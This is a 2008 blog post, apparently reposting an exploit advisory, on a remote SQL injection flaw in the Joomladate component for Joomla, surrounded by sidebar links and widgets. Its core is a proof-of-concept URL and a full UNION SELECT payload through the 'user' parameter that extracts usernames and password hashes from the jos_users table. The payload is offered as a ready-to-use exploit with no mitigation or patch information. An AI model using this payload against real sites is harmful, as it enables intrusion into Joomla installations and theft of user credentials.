Path to improvements :: Joomladate Remote SQL injection :: June

Al Quran Online

My site is worth$12,739.2Your website value?

Free Hijri Date

Jakarta Time

Google Chrome
internet browser
download

BIND DNS Server
Windows Version

Squid Proxy Server
SQUID-2.7.STABLE7
Windows Version Squid Proxy Server Win32

Yahoo! Multi Patcher
Yahoo Multi Patcher

Yahoo! Messenger 10 - PC
Yahoo Messenger 10

Opera Mini 5
opera-mini

Yahoo! Messenger - E Buddy
Yahoo Messenger E Buddy

Search:

Most Recent Posts

Prayer Time:

Bookmark Me:

Other:

Indonesian Rupiah Exchange Rate

Decoder Code : b509xps0l

Meet me in Facebook :

Meet me in Friendster :

Donate with:
registration click

Page copy protected against web site content infringement by Copyscape

Blog Tools:

ShoutMix

Nokia Mastercode Generator

UserCash.com
make money placing
links on websites,
blogs,forums etc.

*** FREEPROXY ***

*** DNS Server List ***

Visit Yahoo! Answer

Click to join vacancy

DNSServer Test

LEVEL 3 Trace

Click to join ID-GPS

Joomladate Remote SQL injection

June 7, 2008

Author : His0k4 [ALGERIAN HaCkEr]
POC : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}
Example :
http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

Posted in IT Things, Sec. Things |

Comments »

The URI to TrackBack this entry is: http://spikecursed.blogsome.com/2008/06/07/joomladate-remote-sql-injection/trackback/

No comments yet.

RSS feed for comments on this post.

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Path to improvements

Links:

Categories: